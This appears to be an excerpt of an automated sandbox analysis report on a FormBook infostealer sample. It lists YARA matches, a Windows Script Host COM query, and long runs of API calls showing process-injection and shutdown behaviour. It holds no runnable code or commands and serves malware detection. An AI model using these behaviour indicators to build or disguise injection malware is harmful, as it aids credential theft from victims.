                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003C9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,15_2_003C9ED5

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2345409248.00000000038A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042CCE3 NtClose,14_2_0042CCE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02B60 NtClose,LdrInitializeThunk,14_2_01A02B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_01A02DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_01A02C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A035C0 NtCreateMutant,LdrInitializeThunk,14_2_01A035C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A04340 NtSetContextThread,14_2_01A04340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A04650 NtSuspendThread,14_2_01A04650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02BA0 NtEnumerateValueKey,14_2_01A02BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02B80 NtQueryInformationFile,14_2_01A02B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02BE0 NtQueryValueKey,14_2_01A02BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02BF0 NtAllocateVirtualMemory,14_2_01A02BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02AB0 NtWaitForSingleObject,14_2_01A02AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02AF0 NtWriteFile,14_2_01A02AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02AD0 NtReadFile,14_2_01A02AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02DB0 NtEnumerateKey,14_2_01A02DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02DD0 NtDelayExecution,14_2_01A02DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02D30 NtUnmapViewOfSection,14_2_01A02D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02D00 NtSetInformationFile,14_2_01A02D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02D10 NtMapViewOfSection,14_2_01A02D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02CA0 NtQueryInformationToken,14_2_01A02CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02CF0 NtOpenProcess,14_2_01A02CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02CC0 NtQueryVirtualMemory,14_2_01A02CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02C00 NtQueryInformationProcess,14_2_01A02C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02C60 NtCreateKey,14_2_01A02C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02FA0 NtQuerySection,14_2_01A02FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02FB0 NtResumeThread,14_2_01A02FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02F90 NtProtectVirtualMemory,14_2_01A02F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02FE0 NtCreateFile,14_2_01A02FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02F30 NtCreateSection,14_2_01A02F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02F60 NtCreateProcessEx,14_2_01A02F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02EA0 NtAdjustPrivilegesToken,14_2_01A02EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02E80 NtReadVirtualMemory,14_2_01A02E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02EE0 NtQueueApcThread,14_2_01A02EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02E30 NtWriteVirtualMemory,14_2_01A02E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A03090 NtSetValueKey,14_2_01A03090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A03010 NtOpenDirectoryObject,14_2_01A03010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A039B0 NtGetContextThread,14_2_01A039B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A03D10 NtOpenProcessToken,14_2_01A03D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A03D70 NtOpenThread,14_2_01A03D70
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00249B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00249B5C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008B1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,7_2_008B1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_008BF122
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_0039F122
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0025355D0_2_0025355D
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0025B76F0_2_0025B76F
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0024BF3D0_2_0024BF3D
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0025A0080_2_0025A008
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0026C0D60_2_0026C0D6
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0025A2220_2_0025A222
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_002552140_2_00255214
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0025C27F0_2_0025C27F
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_002692D00_2_002692D0
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_002743600_2_00274360
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_002546CF0_2_002546CF
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_002786D20_2_002786D2
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0027480E0_2_0027480E
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_002448AA0_2_002448AA
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00245AFE0_2_00245AFE
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0025ABC80_2_0025ABC8
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0025BC050_2_0025BC05
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00247CBA0_2_00247CBA
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00254D320_2_00254D32
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00243D9D0_2_00243D9D
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0026BEA70_2_0026BEA7
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00245F390_2_00245F39
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00255F0B0_2_00255F0B
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0119A1B07_3_0119A1B0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0119A1A97_3_0119A1A9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011999207_3_01199920
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0119B1C07_3_0119B1C0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0119B1C27_3_0119B1C2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0119A9F07_3_0119A9F0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0119B6607_3_0119B660
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_010FE4207_3_010FE420
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011450287_3_01145028
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011450287_3_01145028
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01143F587_3_01143F58
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01143F587_3_01143F58
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_010FD3507_3_010FD350
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01145C987_3_01145C98
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01145C987_3_01145C98
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_010FF0907_3_010FF090
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_010FDBD97_3_010FDBD9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011457F87_3_011457F8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011457F87_3_011457F8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011457FA7_3_011457FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011457FA7_3_011457FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_010FDBE07_3_010FDBE0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011447E17_3_011447E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011447E17_3_011447E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011447E87_3_011447E8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011447E87_3_011447E8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_010FEBF27_3_010FEBF2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_010FEBF07_3_010FEBF0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011450287_3_01145028
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011450287_3_01145028
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01143F587_3_01143F58
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01143F587_3_01143F58
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01145C987_3_01145C98
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01145C987_3_01145C98
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011457F87_3_011457F8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011457F87_3_011457F8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011457FA7_3_011457FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011457FA7_3_011457FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011447E17_3_011447E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011447E17_3_011447E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011447E87_3_011447E8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_011447E87_3_011447E8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118CEAD7_3_0118CEAD
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C7ED7_3_0118C7ED
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118C3E17_3_0118C3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118F3E17_3_0118F3E1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_0118DBE27_3_0118DBE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0086E0BE7_2_0086E0BE
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008720077_2_00872007
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008780377_2_00878037
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0085E1A07_2_0085E1A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0088A28E7_2_0088A28E
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008722C27_2_008722C2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0085225D7_2_0085225D
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0086C59E7_2_0086C59E
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008DC7A37_2_008DC7A3
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0088E89F7_2_0088E89F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C291A7_2_008C291A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00886AFB7_2_00886AFB
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008B8B277_2_008B8B27
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0087CE307_2_0087CE30
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008E51D27_2_008E51D2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008871697_2_00887169
